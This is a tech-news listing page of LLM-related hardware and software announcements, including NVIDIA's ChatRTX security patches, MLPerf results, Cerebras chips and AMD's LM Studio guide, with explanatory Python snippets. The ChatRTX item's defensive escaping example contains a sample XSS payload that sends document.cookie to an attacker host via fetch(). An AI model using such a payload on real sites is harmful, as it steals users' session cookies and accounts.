News Posts matching #LLM


Intel Builds World's Largest Neuromorphic System to Enable More Sustainable AI

Today, Intel announced that it has built the world's largest neuromorphic system. Code-named Hala Point, the system is initially deployed at Sandia National Laboratories and uses Intel's Loihi 2 processor. It is intended to support research into future brain-inspired artificial intelligence (AI) and to tackle challenges related to the efficiency and sustainability of today's AI. Hala Point builds on Intel's first-generation large-scale research system, Pohoiki Springs, with architectural improvements that deliver over 10 times more neuron capacity and up to 12 times higher performance.

"The computing cost of today's AI models is rising at unsustainable rates. The industry needs fundamentally new approaches capable of scaling. For that reason, we developed Hala Point, which combines deep learning efficiency with novel brain-inspired learning and optimization capabilities. We hope that research with Hala Point will advance the efficiency and adaptability of large-scale AI technology." -Mike Davies, director of the Neuromorphic Computing Lab at Intel Labs

NVIDIA Issues Patches for ChatRTX AI Chatbot, Susceptible to Improper Privilege Management

Just a month after releasing the 0.1 beta preview of Chat with RTX, now called ChatRTX, NVIDIA has swiftly addressed critical security vulnerabilities discovered in its cutting-edge AI chatbot. The chatbot was found to be susceptible to cross-site scripting attacks (CWE-79) and improper privilege management attacks (CWE-269) in version 0.2 and all prior releases. The identified vulnerabilities posed significant risks to users' personal data and system security. Cross-site scripting attacks could allow malicious actors to inject scripts into the chatbot's interface, potentially compromising sensitive information. The improper privilege management flaw could also enable attackers to escalate their privileges and gain administrative control over users' systems and files.
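To make the cross-site scripting risk concrete: if a chat interface inserts model output into a web page as raw HTML, a reply containing a `<script>` tag runs in the user's browser. The Python sketch below shows the generic defense of escaping output before rendering. `render_chat_message` is a hypothetical helper, and this is not a description of how NVIDIA fixed ChatRTX, which the announcement does not detail.

```python
import html


def render_chat_message(reply: str) -> str:
    """Hypothetical helper: wrap a chatbot reply in HTML for display.

    html.escape() turns &, <, > and (with quote=True) both quote characters
    into HTML entities, so markup inside the reply is shown as text instead
    of being parsed and executed by the browser.
    """
    return f'<div class="chat-reply">{html.escape(reply, quote=True)}</div>'


# A reply that tries to smuggle a script into the chat window.
malicious = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
print(render_chat_message(malicious))
```

Escaping at the point of rendering, rather than trying to filter "bad" words out of the model's text, is the usual choice because it neutralizes any markup regardless of how it was produced.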

Upon becoming aware of these vulnerabilities, NVIDIA promptly released an updated version of ChatRTX 0.2, available for download from its official website. The latest iteration of the software addresses these security issues, providing users with a more secure experience. As ChatRTX uses retrieval-augmented generation (RAG) and NVIDIA TensorRT-LLM software to let users connect the chatbot to their personal data, the presence of such vulnerabilities is particularly concerning. Users are strongly advised to update their ChatRTX software to the latest version to mitigate potential risks and protect their personal information. ChatRTX remains in beta, with no official release candidate timeline announced. As NVIDIA continues to develop and refine this AI chatbot, the company must prioritize security and promptly address any vulnerabilities that may arise, ensuring a safe and reliable user experience.
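RAG does not retrain the model: at question time, the system looks up passages in the user's documents that resemble the question and adds them to the prompt. The Python sketch below shows that flow under simplifying assumptions. It scores documents with bag-of-words cosine similarity instead of the neural embeddings a real RAG pipeline would typically use, and `retrieve`, `build_prompt`, and the sample documents are hypothetical, not ChatRTX APIs or data.

```python
from __future__ import annotations

import math
import re
from collections import Counter


def tokenize(text: str) -> list[str]:
    """Lowercase the text and split it into alphanumeric words."""
    return re.findall(r"[a-z0-9]+", text.lower())


def cosine(a: Counter, b: Counter) -> float:
    """Cosine similarity between two word-count vectors."""
    dot = sum(a[t] * b[t] for t in a)
    norm = math.sqrt(sum(v * v for v in a.values())) * math.sqrt(sum(v * v for v in b.values()))
    return dot / norm if norm else 0.0


def retrieve(query: str, docs: list[str], k: int = 1) -> list[str]:
    """Return the k documents most similar to the query."""
    q = Counter(tokenize(query))
    ranked = sorted(docs, key=lambda d: cosine(q, Counter(tokenize(d))), reverse=True)
    return ranked[:k]


def build_prompt(query: str, docs: list[str]) -> str:
    """Prepend the retrieved passages to the question; the LLM itself is unchanged."""
    context = "\n".join(retrieve(query, docs, k=2))
    return f"Answer using only this context:\n{context}\n\nQuestion: {query}"


DOCS = [
    "The invoice for March was paid on April 2.",
    "Our office moves to Building 7 in June.",
    "The cat prefers salmon.",
]
print(build_prompt("When was the March invoice paid?", DOCS))
```

Because the user's files end up inside the prompt, anything that can tamper with that pipeline or the interface displaying its output can reach personal data, which is why the vulnerabilities above matter.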

NVIDIA Hopper Leaps Ahead in Generative AI at MLPerf

It's official: NVIDIA delivered the world's fastest platform in industry-standard tests for inference on generative AI. In the latest MLPerf benchmarks, NVIDIA TensorRT-LLM—software that speeds and simplifies the complex job of inference on large language models—boosted the performance of NVIDIA Hopper architecture GPUs on the GPT-J LLM nearly 3x over their results just six months ago. The dramatic speedup demonstrates the power of NVIDIA's full-stack platform of chips, systems and software to handle the demanding requirements of running generative AI. Leading companies are using TensorRT-LLM to optimize their models. And NVIDIA NIM—a set of inference microservices that includes inferencing engines like TensorRT-LLM—makes it easier than ever for businesses to deploy NVIDIA's inference platform.

Raising the Bar in Generative AI
TensorRT-LLM running on NVIDIA H200 Tensor Core GPUs—the latest, memory-enhanced Hopper GPUs—delivered the fastest performance running inference in MLPerf's biggest test of generative AI to date. The new benchmark uses the largest version of Llama 2, a state-of-the-art large language model packing 70 billion parameters. The model is more than 10x larger than the GPT-J LLM first used in the September benchmarks. The memory-enhanced H200 GPUs, in their MLPerf debut, used TensorRT-LLM to produce up to 31,000 tokens/second, a record on MLPerf's Llama 2 benchmark. The H200 GPU results include up to 14% gains from a custom thermal solution. It's one example of innovations beyond standard air cooling that systems builders are applying to their NVIDIA MGX designs to take the performance of Hopper GPUs to new heights.

Tiny Corp. Prepping Separate AMD & NVIDIA GPU-based AI Compute Systems

George Hotz and his startup operation (Tiny Corporation) appeared ready to completely abandon AMD Radeon GPUs last week, after a period of firmware-related headaches. The original plan involved a pre-orderable $15,000 TinyBox AI compute cluster housing six XFX Speedster MERC310 RX 7900 XTX graphics cards, but software and driver issues prompted experiments with alternative hardware. Much of the media coverage has focused on the unusual choice of consumer-grade GPUs, and Tiny Corp.'s struggles with RDNA 3 (rather than CDNA 3) drew further public attention after top AMD executives weighed in.

The startup's social media feed openly showcases everyday tasks, problem-solving, and important decision-making. Several Acer Predator BiFrost Arc A770 OC cards were purchased and promptly integrated into a colorfully lit TinyBox prototype, but Hotz & Co. swiftly moved on to Team Green pastures. Tiny Corp. has begrudgingly adopted NVIDIA GeForce RTX 4090 GPUs. Earlier today, it was announced that work on the AMD-based system has resumed, although customers were forewarned about anticipated teething problems. The surprising message arrived in the early hours: "a hard to find 'umr' repo has turned around the feasibility of the AMD TinyBox. It will be a journey, but it gives us an ability to debug. We're going to sell both, red for $15,000 and green for $25,000. When you realize your pre-order you'll choose your color. Website has been updated. If you like to tinker and feel pain, buy red. The driver still crashes the GPU and hangs sometimes, but we can work together to improve it."

Qualcomm Announces the Snapdragon 7+ Gen 3, Featuring Exceptional On-Device AI Capabilities

Qualcomm Technologies, Inc., unveiled today the Snapdragon 7+ Gen 3 Mobile Platform, bringing on-device generative AI into the Snapdragon 7 series. The Mobile Platform supports a wide range of AI models including large language models (LLMs) such as Baichuan-7B, Llama 2, and Gemini Nano. Fueling extraordinary entertainment capabilities, Snapdragon 7+ Gen 3 also brings new select Snapdragon Elite Gaming features to the 7-series including Game Post Processing Accelerator and Adreno Frame Motion Engine 2, enhancing game effects and upscaling gaming content for desktop-level visuals. Plus, this platform brings top-notch photography features with our industry-leading 18-bit cognitive ISP.

"Today, we embark on the latest expansion in the 7-series to create new levels of entertainment for consumers - integrating next-generation technologies for richer experiences," said Chris Patrick, senior vice president and general manager of mobile handsets, Qualcomm Technologies, Inc. "Snapdragon 7+ Gen 3 is packed with support for incredible on-device generative AI features and provides incredible performance and power efficiency, while bringing Wi-Fi 7 to the Snapdragon 7 Series for the first time."

Samsung Roadmaps UFS 5.0 Storage Standard, Predicts Commercialization by 2027

Mobile tech tipster Revegnus has highlighted an interesting Samsung presentation slide. According to a machine translation, the company's electronics division is already responding to anticipated growth in "client-side large language model" service development. This market trend will demand faster Universal Flash Storage (UFS) interfaces, and Samsung engineers are currently "developing a new product that uses UFS 4.0 technology, but increases the number of channels from the current 2 to 4." The upcoming "more advanced" UFS 4.0 storage chips could be beefy enough to pair with next-gen mobile processors in 2025. For example, Arm is gearing up "Blackhawk," the Cortex-X4's successor, and industry watchers reckon that the new core is designed to deliver "great Large Language Model (LLM) performance" on future smartphones. Samsung's roadmap outlines another major R&D goal, but this prospect is far from finalized: the chart reveals an anticipated 2027 rollout. The slide's body text included a brief teaser: "at the same time, we are also actively participating in discussions on the UFS 5.0 standard."
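Why doubling the link width matters can be shown with simple arithmetic. The sketch below assumes that the slide's "channels" correspond to UFS/M-PHY lanes, that each lane runs at the roughly 23.2 Gbit/s commonly quoted for UFS 4.0, and that raw bandwidth scales linearly with lane count. It ignores encoding and protocol overhead, so real-world transfer rates would be lower than these figures.

```python
# Assumptions: ~23.2 Gbit/s per lane (the figure commonly quoted for UFS 4.0),
# and "channels" on the slide meaning lanes. Overhead is ignored.
PER_LANE_GBPS = 23.2


def raw_link_gbps(lanes: int, per_lane_gbps: float = PER_LANE_GBPS) -> float:
    """Raw interface bandwidth in Gbit/s, ignoring encoding/protocol overhead."""
    return lanes * per_lane_gbps


for lanes in (2, 4):
    gbps = raw_link_gbps(lanes)
    print(f"{lanes} lanes: {gbps:.1f} Gbit/s raw (~{gbps / 8:.1f} GB/s before overhead)")
```

Under these assumptions the 4-lane part would simply double the raw interface ceiling; whether the flash behind it can sustain that is a separate question the slide does not answer.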

Tiny Corp. Pauses Development of AMD Radeon GPU-based Tinybox AI Cluster

George Hotz and his Tiny Corporation colleagues were pinning their hopes on AMD delivering some good news earlier this month. The development of the "TinyBox" AI compute cluster hit some major roadblocks a couple of weeks ago, when Radeon RX 7900 XTX GPU firmware was not gelling with Tiny Corp.'s setup. Hotz expressed "70% confidence" that AMD would approve open-sourcing certain bits of firmware. At the time of writing, this has not happened, and this week the Tiny Corp. social media account has once again switched to an "all guns blazing" mode. Hotz and Co. have publicly disclosed that they were dabbling with Intel Arc graphics cards as of a few weeks ago, and freshly posted comments name NVIDIA hardware as another possible route.

Yesterday, it was confirmed that the young startup organization had paused its utilization of XFX Speedster MERC310 RX 7900 XTX graphics cards: "the driver is still very unstable, and when it crashes or hangs we have no way of debugging it. We have no way of dumping the state of a GPU. Apparently it isn't just the MES causing these issues, it's also the Command Processor (CP). After seeing how open Tenstorrent is, it's hard to deal with this. With Tenstorrent, I feel confident that if there's an issue, I can debug and fix it. With AMD, I don't." The $15,000 TinyBox system relies on "cheaper" gaming-oriented GPUs, rather than traditional enterprise solutions—this oddball approach has attracted a number of customers, but the latest announcements likely signal another delay. Yesterday's tweet continued to state: "we are exploring Intel, working on adding Level Zero support to tinygrad. We also added a $400 bounty for XMX support. We are also (sadly) exploring a 6x GeForce RTX 4090 GPU box. At least we know the software is good there. We will revisit AMD once we have an open and reproducible build process for the driver and firmware. We are willing to dive really deep into hardware to make it amazing. But without access, we can't."

Ubisoft Exploring Generative AI, Could Revolutionize NPC Narratives

Have you ever dreamed of having a real conversation with an NPC in a video game? Not one gated within a dialogue tree of predetermined answers, but an actual conversation, conducted through spontaneous action and reaction? Lately, a small R&D team at Ubisoft's Paris studio, working with NVIDIA's Audio2Face application and Inworld's large language model (LLM), has been experimenting with generative AI in an attempt to turn this dream into a reality. Their project, NEO NPC, uses GenAI to probe the limits of how a player can interact with an NPC without breaking the authenticity of the situation they are in, or the character of the NPC itself.

With that word, authenticity, in mind, the project has had to be a hugely collaborative effort across artistic and scientific disciplines. Generative AI is a hot topic of conversation in the video game industry, and Guillemette Picard, Senior Vice President of Production Technology, is keen to stress that the goal behind all genAI projects at Ubisoft is to bring value to the player, which means continuing to focus on human creativity behind the scenes. "The way we worked on this project, is always with our players and our developers in mind," says Picard. "With the player in mind, we know that developers and their creativity must still drive our projects. Generative AI is only of value if it has value for them."

NVIDIA Digital Human Technologies Bring AI Characters to Life

NVIDIA announced today that leading AI application developers across a wide range of industries are using NVIDIA digital human technologies to create lifelike avatars for commercial applications and dynamic game characters. The results are on display at GTC, the global AI conference held this week in San Jose, Calif., and can be seen in technology demonstrations from Hippocratic AI, Inworld AI, UneeQ and more.

NVIDIA Avatar Cloud Engine (ACE) for speech and animation, NVIDIA NeMo for language, and NVIDIA RTX for ray-traced rendering are the building blocks that enable developers to create digital humans capable of AI-powered natural language interactions, making conversations more realistic and engaging.

NVIDIA Blackwell Platform Arrives to Power a New Era of Computing

Powering a new era of computing, NVIDIA today announced that the NVIDIA Blackwell platform has arrived—enabling organizations everywhere to build and run real-time generative AI on trillion-parameter large language models at up to 25x less cost and energy consumption than its predecessor.

The Blackwell GPU architecture features six transformative technologies for accelerated computing, which will help unlock breakthroughs in data processing, engineering simulation, electronic design automation, computer-aided drug design, quantum computing and generative AI—all emerging industry opportunities for NVIDIA.

Gigabyte Unveils Comprehensive and Powerful AI Platforms at NVIDIA GTC

GIGABYTE Technology and Giga Computing, a subsidiary of GIGABYTE and an industry leader in enterprise solutions, will showcase their solutions at the GIGABYTE booth #1224 at NVIDIA GTC, a global AI developer conference running through March 21. This event will offer GIGABYTE the chance to connect with its valued partners and customers, and together explore what the future in computing holds.

The GIGABYTE booth will focus on GIGABYTE's enterprise products that demonstrate AI training and inference delivered by versatile computing platforms based on NVIDIA solutions, as well as direct liquid cooling (DLC) for improved compute density and energy efficiency. Also not to be missed at the NVIDIA booth is the MGX Pavilion, which features a rack of GIGABYTE servers for the NVIDIA GH200 Grace Hopper Superchip architecture.

Report: Apple to Use Google's Gemini AI for iPhones

In a world where the largest companies are riding the AI train, the biggest of them all, Apple, seemed to stay quiet for a while. Even as many companies announced their own systems and models, Apple stayed relatively silent about the use of LLMs in its products. However, according to Bloomberg, Apple is not pushing out an AI model of its own; rather, it will license Google's leading Gemini models for its iPhone smartphones. Gemini is Google's flagship AI model family, with three variants: Gemini Nano 1/2, Gemini Pro, and Gemini Ultra. Gemini Nano 1 and Nano 2 are designed to run locally on hardware like smartphones, while Gemini Pro and Ultra run on Google's servers and are accessed from the device over the internet through an API.

Apple could use a local Gemini Nano for basic tasks while also tapping Gemini Pro or Ultra for more complex ones, with a router sending each user request to the appropriate available model. That way, users could use AI capabilities both online and offline. Since Apple is readying a suite of changes for iOS 18, backed by the Neural Engine inside its A-series Bionic chips, the LLM capabilities of Apple's iPhones might get a significant upgrade from the Google partnership. While the size of the deal is still unknown, it would surely be a massive win for Google to tap into the millions of devices Apple ships every year, and for Apple to give its users a more optimized experience.
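Bloomberg's report does not describe how such routing would work. As a purely hypothetical sketch, the Python function below keeps every request on the device when there is no connection, keeps short prompts local, and sends long prompts to a cloud model. The word-count threshold is an assumed stand-in for a real complexity estimate, and the model labels are illustrative, not Apple or Google identifiers.

```python
from __future__ import annotations

from dataclasses import dataclass

LOCAL_MODEL = "on-device model (Nano-class)"   # hypothetical label
CLOUD_MODEL = "cloud model (Pro/Ultra-class)"  # hypothetical label


@dataclass(frozen=True)
class Route:
    model: str
    reason: str


def route_request(prompt: str, online: bool, max_local_words: int = 200) -> Route:
    """Pick a model for one request.

    Word count is a crude, assumed proxy for task complexity: offline
    requests always stay local, short ones stay local, long ones go to the cloud.
    """
    if not online:
        return Route(LOCAL_MODEL, "offline")
    if len(prompt.split()) <= max_local_words:
        return Route(LOCAL_MODEL, "short prompt")
    return Route(CLOUD_MODEL, "long prompt")


print(route_request("Draft a reply saying I'll be late", online=True))
print(route_request("word " * 500, online=True))
print(route_request("word " * 500, online=False))
```

The offline check comes first so the assistant degrades to the local model instead of failing when there is no network, which is the online/offline benefit described above.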

MemVerge and Micron Boost NVIDIA GPU Utilization with CXL Memory

MemVerge, a leader in AI-first Big Memory Software, has joined forces with Micron to unveil a groundbreaking solution that leverages intelligent tiering of CXL memory, boosting the performance of large language models (LLMs) by offloading from GPU HBM to CXL memory. This innovative collaboration is being showcased in Micron booth #1030 at GTC, where attendees can witness firsthand the transformative impact of tiered memory on AI workloads.

Charles Fan, CEO and Co-founder of MemVerge, emphasized the critical importance of overcoming the bottleneck of HBM capacity. "Scaling LLM performance cost-effectively means keeping the GPUs fed with data," stated Fan. "Our demo at GTC demonstrates that pools of tiered memory not only drive performance higher but also maximize the utilization of precious GPU resources."
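MemVerge's announcement does not spell out its tiering policy. The toy Python class below illustrates the general idea of tiered memory with a least-recently-used (LRU) policy, which is an assumption made for illustration: a small fast tier stands in for GPU HBM, a larger slow tier stands in for CXL-attached memory, cold entries are demoted when the fast tier fills, and reading a demoted entry promotes it back. `TieredStore` is a hypothetical name, not a MemVerge or Micron API.

```python
from __future__ import annotations

from collections import OrderedDict


class TieredStore:
    """Toy two-tier store: a bounded fast tier (stand-in for HBM) and an
    unbounded slow tier (stand-in for CXL memory), managed with LRU."""

    def __init__(self, fast_capacity: int):
        self.fast_capacity = fast_capacity
        self.fast: OrderedDict[str, bytes] = OrderedDict()  # oldest entry first
        self.slow: dict[str, bytes] = {}

    def put(self, key: str, value: bytes) -> None:
        """Place (or refresh) an entry in the fast tier, demoting overflow."""
        self.slow.pop(key, None)
        self.fast[key] = value
        self.fast.move_to_end(key)
        self._demote_overflow()

    def get(self, key: str) -> tuple[bytes, str]:
        """Return (value, tier it was found in); slow-tier hits are promoted."""
        if key in self.fast:
            self.fast.move_to_end(key)
            return self.fast[key], "fast"
        value = self.slow.pop(key)  # raises KeyError if the key is unknown
        self.put(key, value)
        return value, "slow"

    def _demote_overflow(self) -> None:
        while len(self.fast) > self.fast_capacity:
            old_key, old_value = self.fast.popitem(last=False)
            self.slow[old_key] = old_value


store = TieredStore(fast_capacity=2)
for key, value in (("a", b"1"), ("b", b"2"), ("c", b"3")):
    store.put(key, value)          # "a" is demoted once "c" arrives
print(store.get("a"))              # found in the slow tier, then promoted
print(list(store.fast), list(store.slow))
```

Real systems tier at the granularity of memory pages or tensors and may use access-frequency statistics rather than pure recency; the sketch only shows why a slower but larger tier can keep more data within reach of the GPU.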

MAINGEAR Introduces PRO AI Workstations Featuring aiDAPTIV+ For Cost-Effective Large Language Model Training

MAINGEAR, a leading provider of high-performance custom PC systems, and Phison, a global leader in NAND controllers and storage solutions, today unveiled groundbreaking MAINGEAR PRO AI workstations with Phison's aiDAPTIV+ technology. Specifically engineered to democratize Large Language Model (LLM) development and training for small and medium-sized businesses (SMBs), these ultra-powerful workstations incorporate aiDAPTIV+ technology to deliver supercomputer LLM training capabilities at a fraction of the cost of traditional AI training servers.

As the demand for large-scale generative AI models continues to surge and their complexity increases, the potential for LLMs also expands. However, this rapid advancement in LLM AI technology has led to a notable boost in hardware requirements, making model training cost-prohibitive and inaccessible for many small to medium businesses.

Cerebras & G42 Break Ground on Condor Galaxy 3 - an 8 exaFLOPs AI Supercomputer

Cerebras Systems, the pioneer in accelerating generative AI, and G42, the Abu Dhabi-based leading technology holding group, today announced the build of Condor Galaxy 3 (CG-3), the third cluster of their constellation of AI supercomputers, the Condor Galaxy. Featuring 64 of Cerebras' newly announced CS-3 systems - all powered by the industry's fastest AI chip, the Wafer-Scale Engine 3 (WSE-3) - Condor Galaxy 3 will deliver 8 exaFLOPs of AI with 58 million AI-optimized cores. The Cerebras and G42 strategic partnership already delivered 8 exaFLOPs of AI supercomputing performance via Condor Galaxy 1 and Condor Galaxy 2, each amongst the largest AI supercomputers in the world. Located in Dallas, Texas, Condor Galaxy 3 brings the current total of the Condor Galaxy network to 16 exaFLOPs.
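The headline figures follow directly from the per-chip numbers Cerebras gives for the WSE-3 (900,000 AI cores and 125 petaflops of peak AI performance, one WSE-3 per CS-3 system). The short Python check below reproduces them; it uses only figures stated in these announcements.

```python
CS3_SYSTEMS = 64               # CS-3 systems in Condor Galaxy 3
CORES_PER_WSE3 = 900_000       # AI cores per WSE-3
PEAK_PFLOPS_PER_WSE3 = 125     # peak AI petaFLOPS per WSE-3
CG1_PLUS_CG2_EXAFLOPS = 8      # existing Condor Galaxy 1 + 2 capacity

cg3_cores = CS3_SYSTEMS * CORES_PER_WSE3
cg3_exaflops = CS3_SYSTEMS * PEAK_PFLOPS_PER_WSE3 / 1_000  # 1 exaFLOPS = 1,000 petaFLOPS
network_exaflops = CG1_PLUS_CG2_EXAFLOPS + cg3_exaflops

print(f"CG-3 cores: {cg3_cores:,} (about {cg3_cores / 1e6:.0f} million)")
print(f"CG-3 peak AI compute: {cg3_exaflops:g} exaFLOPs")
print(f"Condor Galaxy network total: {network_exaflops:g} exaFLOPs")
```

The "58 million" core count is 57.6 million rounded up, and these are peak AI figures, not sustained throughput on a real training job.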

"With Condor Galaxy 3, we continue to achieve our joint vision of transforming the worldwide inventory of AI compute through the development of the world's largest and fastest AI supercomputers," said Kiril Evtimov, Group CTO of G42. "The existing Condor Galaxy network has trained some of the leading open-source models in the industry, with tens of thousands of downloads. By doubling the capacity to 16exaFLOPs, we look forward to seeing the next wave of innovation Condor Galaxy supercomputers can enable." At the heart of Condor Galaxy 3 are 64 Cerebras CS-3 Systems. Each CS-3 is powered by the new 4 trillion transistor, 900,000 AI core WSE-3. Manufactured at TSMC at the 5-nanometer node, the WSE-3 delivers twice the performance at the same power and for the same price as the previous generation part. Purpose built for training the industry's largest AI models, WSE-3 delivers an astounding 125 petaflops of peak AI performance per chip.

ZOTAC Expands Computing Hardware with GPU Server Product Line for the AI-Bound Future

ZOTAC Technology Limited, a global leader in innovative technology solutions, expands its product portfolio with the GPU Server Series. The first series of products in ZOTAC's Enterprise lineup offers organizations affordable and high-performance computing solutions for a wide range of demanding applications, from core-to-edge inferencing and data visualization to model training, HPC modeling, and simulation.

The ZOTAC series of GPU Servers comes in a diverse range of form factors and configurations, featuring both Tower Workstations and Rack Mount Servers, as well as both Intel and AMD processor configurations. With support for up to 10 GPUs, modular design for easier access to internal hardware, a high space-to-performance ratio, and industry-standard features like redundant power supplies and extensive cooling options, ZOTAC's enterprise solutions can ensure optimal performance and durability, even under sustained intense workloads.

Cerebras Systems Unveils World's Fastest AI Chip with 4 Trillion Transistors and 900,000 AI cores

Cerebras Systems, the pioneer in accelerating generative AI, has doubled down on its existing world record of fastest AI chip with the introduction of the Wafer Scale Engine 3. The WSE-3 delivers twice the performance of the previous record-holder, the Cerebras WSE-2, at the same power draw and for the same price. Purpose built for training the industry's largest AI models, the 5 nm-based, 4 trillion transistor WSE-3 powers the Cerebras CS-3 AI supercomputer, delivering 125 petaflops of peak AI performance through 900,000 AI optimized compute cores.

Intel Gaudi2 Accelerator Beats NVIDIA H100 at Stable Diffusion 3 by 55%

Stability AI, the developer behind the popular Stable Diffusion generative AI model, has run some first-party performance benchmarks for Stable Diffusion 3 using popular data-center AI GPUs, including the NVIDIA H100 "Hopper" 80 GB, A100 "Ampere" 80 GB, and Intel's Gaudi2 96 GB accelerator. Unlike the H100, which is a super-scalar CUDA+Tensor core GPU, the Gaudi2 is purpose-built to accelerate generative AI and LLMs. Stability AI published its performance findings in a blog post, which reveals that the Intel Gaudi2 96 GB posts roughly 56% higher performance than the H100 80 GB.

With 2 nodes, 16 accelerators, and a constant batch size of 16 per accelerator (256 in all), the Intel Gaudi2 array generates 927 images per second, compared to 595 images per second for the H100 array and 381 images per second for the A100 array, with accelerator and node counts held constant. Scaling up to 32 nodes and 256 accelerators at a batch size of 16 per accelerator (a total batch size of 4,096), the Gaudi2 array posts 12,654 images per second, or 49.4 images per second per device, compared to 3,992 images per second, or 15.6 images per second per device, for the older-gen A100 "Ampere" array.
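The per-device and relative figures above can be recomputed from the reported throughputs. The Python snippet below uses only the images-per-second numbers quoted from Stability AI's post; note that no 256-accelerator H100 result is given here, so that cell is simply absent.

```python
# Images/second as reported by Stability AI and quoted above.
RESULTS = {
    "Gaudi2": {16: 927, 256: 12_654},
    "H100": {16: 595},
    "A100": {16: 381, 256: 3_992},
}
BATCH_PER_ACCELERATOR = 16


def per_device(images_per_sec: float, accelerators: int) -> float:
    """Throughput of one accelerator in the array."""
    return images_per_sec / accelerators


def speedup(a: float, b: float) -> float:
    """Relative advantage of a over b; 0.5 means 50% faster."""
    return a / b - 1


for accels in (16, 256):
    print(f"{accels} accelerators, total batch {accels * BATCH_PER_ACCELERATOR}:")
    for name, runs in RESULTS.items():
        if accels in runs:
            print(f"  {name}: {per_device(runs[accels], accels):.1f} images/s per device")

print(f"Gaudi2 vs H100, 16 accelerators: {speedup(927, 595):.1%} faster")
print(f"Gaudi2 vs A100, 256 accelerators: {speedup(12_654, 3_992):.1%} faster")
```

The 16-accelerator comparison works out to about 55.8%, which is why both "55%" and "roughly 56%" appear in coverage of this result.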

AMD Publishes User Guide for LM Studio - a Local AI Chatbot

AMD has caught up with NVIDIA and Intel in the race to get a locally run AI chatbot up and running on its own hardware. Team Red's community hub welcomed a new blog entry on Wednesday: AI staffers published a handy step-by-step guide, "How to run a Large Language Model (LLM) on your AMD Ryzen AI PC or Radeon Graphics Card." They recommend that interested parties start by downloading the correct version of LM Studio. With the CPU-bound Windows variant, designed for higher-end Phoenix and Hawk Point chips, compatible Ryzen AI PCs can run instances of a GPT-based, LLM-powered AI chatbot. The LM Studio ROCm technical preview works similarly, but requires a Radeon RX 7000 series graphics card. Supported GPU targets include gfx1100, gfx1101, and gfx1102.

AMD believes that "AI assistants are quickly becoming essential resources to help increase productivity, efficiency or even brainstorm for ideas." Their blog also puts a spotlight on LM Studio's offline functionality: "Not only does the local AI chatbot on your machine not require an internet connection—but your conversations stay on your local machine." The six-step guide invites curious members to experiment with a handful of large language models, most notably Mistral 7B and Llama 2 7B. AMD strongly recommends selecting model files labeled "Q4_K_M" (4-bit quantization). The guide walks readers through spooling up "your very own AI chatbot."
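4-bit quantization stores each weight as a small integer plus a shared scale factor, cutting memory use roughly fourfold versus FP16. The Python sketch below shows the basic idea with simple symmetric "absmax" quantization of one block of weights. It is an illustration under that assumption only: the "Q4_K_M" files AMD recommends use a more elaborate block-wise format, and the function names here are hypothetical.

```python
from __future__ import annotations


def quantize_block_4bit(weights: list[float]) -> tuple[float, list[int]]:
    """Symmetric absmax quantization of one block of weights.

    Each weight becomes a signed 4-bit integer in [-7, 7]; one float scale
    per block is kept so the values can be approximately restored.
    """
    max_abs = max(abs(w) for w in weights)
    scale = max_abs / 7 if max_abs > 0 else 1.0
    codes = [max(-7, min(7, round(w / scale))) for w in weights]
    return scale, codes


def dequantize_block(scale: float, codes: list[int]) -> list[float]:
    """Approximate the original weights from the 4-bit codes."""
    return [c * scale for c in codes]


block = [0.12, -0.50, 0.33, 0.07, -0.21, 0.49, -0.02, 0.0]
scale, codes = quantize_block_4bit(block)
restored = dequantize_block(scale, codes)
print("codes:", codes)
print("max error:", max(abs(a - b) for a, b in zip(block, restored)))
# 8 weights x 4 bits = 4 bytes of codes (plus one scale), versus 16 bytes at FP16.
```

Each restored weight is off by at most half a quantization step, which is the accuracy traded for the smaller files that let 7B-parameter models fit on consumer hardware.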

Chinese Governing Bodies Reportedly Offering "Compute Vouchers" to AI Startups

Regional Chinese governments are attempting to prop up local AI startups with an intriguing "voucher" support system. A Financial Times article outlines "computing" support packages valued at "$140,000 to $280,000" for fledgling organizations involved in LLM training. Widespread shortages of AI chips and rising data center operating costs are cited as the main factors driving the rollout of these strategic subsidies. The big three (Alibaba, Tencent, and ByteDance) are reportedly less willing to rent out their AI-crunching servers because their internal operations demand lengthy compute sessions. China's largest technology companies are believed to be hoarding the vast majority of NVIDIA AI hardware, while smaller competitors are believed to be fighting over table scraps. US trade restrictions have further escalated supply issues, with even lower-performance, China-specific models being rejected; AMD's Instinct MI309 AI accelerator is the latest example.

The "compute voucher" initiative could be the first part of a wider scheme: reports suggest that regional governing bodies (including Shanghai) are devising another subsidy tier for domestic AI chips. Charlie Chai, an 86Research analyst, reckons that the initial support package is only a short-term solution. He shared this observation with the FT: "the voucher is helpful to address the cost barrier, but it will not help with the scarcity of the resources." The Chinese government is reportedly looking into creating an alternative state-run system that would be less reliant on a "Big Tech" data center model. A proposed "East Data West Computing" project could produce a more energy-efficient cluster of AI data centers, combined with a centralized management system.

IBM Announces Availability of Open-Source Mistral AI Model on watsonx

IBM announced the availability of the popular open-source Mixtral-8x7B large language model (LLM), developed by Mistral AI, on its watsonx AI and data platform, as it continues to expand capabilities to help clients innovate with IBM's own foundation models and those from a range of open-source providers. IBM offers an optimized version of Mixtral-8x7B that, in internal testing, was able to increase throughput—or the amount of data that can be processed in a given time period—by 50 percent when compared to the regular model. This could potentially cut latency by 35-75 percent, depending on batch size—speeding time to insights. This is achieved through a process called quantization, which reduces model size and memory requirements for LLMs and, in turn, can speed up processing to help lower costs and energy consumption.

The addition of Mixtral-8x7B expands IBM's open, multi-model strategy to meet clients where they are and give them choice and flexibility to scale enterprise AI solutions across their businesses. Through decades-long AI research and development, open collaboration with Meta and Hugging Face, and partnerships with model leaders, IBM is expanding its watsonx.ai model catalog and bringing in new capabilities, languages, and modalities. IBM's enterprise-ready foundation model choices and its watsonx AI and data platform can empower clients to use generative AI to gain new insights and efficiencies, and create new business models based on principles of trust. IBM enables clients to select the right model for the right use cases and price-performance goals for targeted business domains like finance.

ServiceNow, Hugging Face & NVIDIA Release StarCoder2 - a New Open-Access LLM Family

ServiceNow, Hugging Face, and NVIDIA today announced the release of StarCoder2, a family of open-access large language models for code generation that sets new standards for performance, transparency, and cost-effectiveness. StarCoder2 was developed in partnership with the BigCode Community, managed by ServiceNow, the leading digital workflow company making the world work better for everyone, and Hugging Face, the most-used open-source platform, where the machine learning community collaborates on models, datasets, and applications. Trained on 619 programming languages, StarCoder2 can be further trained and embedded in enterprise applications to perform specialized tasks such as application source code generation, workflow generation, text summarization, and more. Developers can use its code completion, advanced code summarization, code snippets retrieval, and other capabilities to accelerate innovation and improve productivity.

